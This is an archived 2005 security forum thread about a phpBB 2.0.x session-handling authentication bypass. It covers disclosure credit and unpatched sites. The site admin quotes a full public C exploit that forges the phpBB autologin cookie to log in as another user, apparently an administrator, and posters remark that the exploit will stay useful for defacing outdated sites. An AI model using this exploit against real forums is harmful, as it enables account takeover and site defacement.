Waraxe IT Security Portal  
  Login or Register
::  Home  ::  Search  ::  Your Account  ::  Forums  ::   Waraxe Advisories  ::  Tools  ::
August 25, 2019
Menu
 Home
 Logout
 Discussions
 Forums
 Members List
 IRC chat
 Tools
 Base64 coder
 MD5 hash
 CRC32 checksum
 ROT13 coder
 SHA-1 hash
 URL-decoder
 Sql Char Encoder
 Affiliates
 y3dips ITsec
 Md5 Cracker
 User Manuals
 AlbumNow
 Content
 Content
 Sections
 FAQ
 Top
 Info
 Feedback
 Recommend Us
 Search
 Journal
 Your Account



User Info
Welcome, Anonymous
Nickname
Password
(Register)

Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9145

People Online:
Visitors: 200
Members: 0
Total: 200
PacketStorm News
Currently there is a problem with headlines from this site
Log in Register Forum FAQ Memberlist Search
IT Security and Insecurity Portal

www.waraxe.us Forum Index -> Suggestions -> another suggestion from me
Post new topic  Reply to topic View previous topic :: View next topic 
another suggestion from me
PostPosted: Sat Apr 09, 2005 4:06 pm Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




waraxe , i see that if u publish/submit some news will get 10 point , but i dont find any news on this site ? how is that ?

i think many people here found many 'good' news to share
btw , why dont u give some space for article section Rolling Eyes maybe for paper about your eexploiting technichal detail for one advisories Smile

ive made one paper about highlight holes in phpbb and already publish in my community site, but as u see im to 'lazy' to write another Sad , so maybe u could write about sql ( i know you good on that Razz) or another interesting point Rolling Eyes

maybe some friends would share ? LINUX ? slimjim ? Heintz ? pokylez or .. somebody ?

heintz : im still waiting about detailed exploiting phpbb Rolling Eyes

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sat Apr 09, 2005 4:18 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Yep, news/articles/topics section is not fully functional yet...
You can still submit the stuff and i will look, if i can put it up right now.
This news thing, it needs some work from me (some code improvements/debug/tests), i will make it functional as soon as possible, but yeah, all submissions are welcome allready now Smile
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Apr 09, 2005 4:35 pm Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




on the contrary , im waiting a paper from you Smile
hehhe.. maybe i post something if i not too busy .. but im not promising here

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sat Apr 09, 2005 5:54 pm Reply with quote
Heintz
Valuable expert
Valuable expert
 
Joined: Jun 12, 2004
Posts: 88
Location: Estonia/Sweden




detailed explotation. well if you want to do it manually then refer to original
thread http://www.waraxe.us/ftopict-525.html.
but i think exploit in C even exists Laughing

if you want more info then look in php manual:
http://se2.php.net/serialize
http://se2.php.net/unserialize
http://se2.php.net/types.boolean

anyway i think this thing is kinda old allready and
all serious sites have patched their software
Smile

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Sat Apr 09, 2005 6:33 pm Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




Heintz, look here:

http://forum.zone-h.org/viewtopic.php?t=2189

Quote:

SyS64738
Zone-H Staff

Posted: Fri Mar 04, 2005 9:54 am Post subject:

--------------------------------------------------------------------------------

http://www.k-otik.com/exploits/20050228.phpbbsession.c.php

that was the one they used.

Relax, all they could do was to change the database. No rights over the machine.

When we choosed phpbb we accounted the forum could be hacked twice per year. It was just about time.
All you have to do now is to start the cronometer and see how long it will take till the next time, you have to live with it unless you want to write your own forum application

For Zone-H is no harsh, after all is only backing up our theory where the future hacking playgorund will be mostly at the application level. Now everybody is saying that but I recall that Zone-H has been the first public source that started to say it around.

Strange we didn't receive any notification about the episode in our mirror database.

A hug

SyS64738
_________________
www.zone-h.org admin



Heh, zone-h is defacer's heaven and they forum got defaced by Heintz exploit Very Happy

But let's look further:

http://www.k-otik.com/exploits/20050228.phpbbsession.c.php

Code:

phpBB 2.0.x Session Handling Administrator Authentication Bypass Exploit
Date : 28/02/2005
 
Related Advisories : FrSIRT/ADV-2005-0212
Rated as : High

/*
Author: Paisterist
Date: 28-02-05
[N]eo [S]ecurity [T]eam ?

Description: this exploit modify the user id that is in your
cookies.txt (Firefox and Mozilla) file.
You have to log in the forum, with the autologin option unchecked,
then you close the navigator and
execute the exploit.
If you have any problem with the exploit, remove all cookies and do all
again.

Note: you have to put the exploit in the same directory of cookies.txt.
This exploit overwrite all phpbb cookies that have the user id
specified.

I HAVE NOT DISCOVERED THIS VULNERABILITY, I DON'T KNOW WHO HAS
DISCOVERED IT.

By Paisterist

http://neosecurityteam.net
http://neosecurityteam.tk

Greetz: Hackzatan, Crashcool, Towner, Daemon21, Wokkko, Maxx,
Arcanhell, Alluz.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char** argv[]) {
FILE *pointer;
char contenido[10000],

cookie[91]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0
%3A%22%22%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%22",
cookief[9]="%22%3B%7D", cookiec[106],

cookie_false[92]="a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bb
%3A1%3Bs%3A6%3A%22userid%22%3Bs%3A1%3A%222%22%3B%7D",
*pos;
int p=0, i=0;

if (argc!=2) {
printf("Usage: phpbb_exploit.exe user_id\n\n");
exit(0);
}
pointer=fopen("cookies.txt", "r");

if (pointer) {
fread(contenido, 300, 10, pointer);
fclose(pointer);
} else {
printf("The file can't be open\n");
exit(0);
}

strcpy(cookiec, cookie);
strncat(cookiec, argv[1], 6);
strcat(cookiec, cookief);

if (pos=strstr(contenido, cookiec)) {
p=pos - contenido;
while (i<92) {
if (cookie_false[i]!=NULL)
contenido[p]=cookie_false[i];
p++;
i++;
}
}
else {
printf("The file cookies.txt isn't valid for execute the
exploit or the user id is incorrect\n");
exit(0);
}

if (pointer=fopen("cookies.txt", "w")) {
fputs(contenido, pointer);
printf("Cookie modified: \n\n%s\n\n", contenido);
printf("The cookies file has overwriten... looks like the exploit has worked");
} else printf("\n\nThe file cookies.txt has not write permissions.");
return 0;
}


As we can see:

Quote:

I HAVE NOT DISCOVERED THIS VULNERABILITY, I DON'T KNOW WHO HAS
DISCOVERED IT.


So they don't know, who has discovered this bug Question
wtf?
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sat Apr 09, 2005 7:04 pm Reply with quote
Heintz
Valuable expert
Valuable expert
 
Joined: Jun 12, 2004
Posts: 88
Location: Estonia/Sweden




yea. very little ammount of people know hwo actually found the bug.
i thought i release the info about bug day earlier to theese forums. to make this sites visitors feel more "privileged" then other security site visitors. and then let developers know to prevent chaos. but someone who read this info allready had let them know about it, and i was a bit late. so they put info to their site and told me i was not going to be credited for it. most exploit writers have probably got the info from phpbb.com.

but i can live with it Cool

but thing is that they are not very friendly also about bug reporting (register to forum, so you could use their bug tracker). but who writes the rules about this thing anyway? they should be makeing it easier to report bugs to them, and be thankful for it, they benefit from it, not bug reporter. if bug reporter have to choose between: 1)registering (which can be tricky when activation code gets caught by spam-filter) and formating the bug very specifically.
or 2) selling it to some pr0n firm for example Laughing (this includes all self-befitting stuff)
then i doupt that all choose the 1.

i hope i made some point.. but i don't expect anyone to understand this Smile

_________________
AT 14:00 /EVERY:1 DHTTP /oindex.php www.waraxe.us:80 | FIND "SA#037" 1>Nul 2>&1 & IF ERRORLEVEL 0 "c:program filesApache.exe stop & DSAY alarmaaa!"
View user's profile Send private message Send e-mail Visit poster's website MSN Messenger
PostPosted: Sun Apr 10, 2005 2:59 am Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




Heintz wrote:
detailed explotation. well if you want to do it manually then refer to original
thread http://www.waraxe.us/ftopict-525.html.
but i think exploit in C even exists Laughing

if you want more info then look in php manual:
http://se2.php.net/serialize
http://se2.php.net/unserialize
http://se2.php.net/types.boolean

anyway i think this thing is kinda old allready and
all serious sites have patched their software
Smile


well thx ,
old thing with new effect Smile

fyi: there are many forum still leave unpatch (what a lazy admin Laughing)

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
PostPosted: Sun Apr 10, 2005 3:03 am Reply with quote
waraxe
Site admin
Site admin
 
Joined: May 11, 2004
Posts: 2407
Location: Estonia, Tartu




y3dips wrote:

fyi: there are many forum still leave unpatch (what a lazy admin Laughing)


This exploit will be vital for long time - because for example even after 6 months from now there will be webmasters, who will install some old phpbb version and its only question of time, when that website will be defaced Rolling Eyes
View user's profile Send private message Send e-mail Visit poster's website
PostPosted: Sun Apr 10, 2005 3:35 am Reply with quote
y3dips
Valuable expert
Valuable expert
 
Joined: Feb 25, 2005
Posts: 281
Location: Indonesia




yap, you right waraxe, the old phpbb version still spread like a time bomb (Laughing) , i download one from SF.net (the 2.0.11) to do some research, first i thought that it already patched , but im wrong coz it leave unpacth Rolling Eyes

so ?

_________________
IO::y3dips->new(http://clog.ammar.web.id);
View user's profile Send private message Visit poster's website Yahoo Messenger
another suggestion from me
  www.waraxe.us Forum Index -> Suggestions
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
All times are GMT  
Page 1 of 1  

  
  
 Post new topic  Reply to topic  




Powered by phpBB 2001-2008 phpBB Group






Hardware reviews
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2013 Janek Vind "waraxe"
Page Generation: 0.069 Seconds